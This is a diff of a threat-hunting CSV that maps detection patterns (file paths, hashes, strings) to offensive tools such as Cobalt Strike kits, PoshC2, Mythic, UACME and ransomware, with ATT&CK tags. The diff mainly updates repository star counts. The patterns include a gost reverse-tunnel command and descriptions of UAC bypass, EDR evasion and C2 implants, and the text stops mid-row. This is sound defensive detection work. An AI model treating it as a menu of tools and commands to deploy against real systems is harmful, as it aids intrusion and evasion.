T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" @@ -8159,44 +8306,44 @@ "*c:/users/public/creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*C:\aab.txt*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*c:\agent.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*C:\dsc_hello.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*C:\dsc_hello.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*C:\ProgramData\Prefetch\na.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*C:\ProgramData\SystemData\microsoft_Windows.dll*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*C:\Temp\file.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*C:\Temp\poc.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" -"*c:\temp\something.ps1*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*c:\temp\something.ps1*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*C:\Uac\results.cab*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" -"*C:\Users\*\AppData\Roaming\Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*C:\Users\*\AppData\Roaming\Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*C:\Users\*\AppData\Roaming\svchost.exe*","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*C:\Users\Public\*.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c:\users\public\creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*c:\users\public\output.txt*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*C:\Users\Public\perm.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*C:\Users\Public\test.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" "*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" -"*C:\Windows\Temp\move.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*C:\Windows\Temp\moveme.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*C:\Windows\Temp\move.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*C:\Windows\Temp\moveme.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*c:\windows\temp\test.tmp farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*C??/generator.cpp*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*c1090dbc-f2f7-4d90-a241-86e0c0217786*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*C2 Client*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*C2 Client*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*C2 Framework for villains*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*C2 Nimplant Server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*C2 Nimplant Server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*C2 Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*C2.KillDate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*C2.KillDate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*c2.striker.*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*C2.UserAgent*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*C2.UserAgent*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*C2/C2Server.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*C2_RPC_functions.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*C2_RPC_functions.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*c2_server*.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*c2_server.resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*C2_Server-main*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*c2_service.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c2_service.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*C2concealer -*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*C2concealer-master*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*'C2Default'*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" @@ -8216,27 +8363,27 @@ "*'c2server'*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*C2Server.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*C2Server.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a 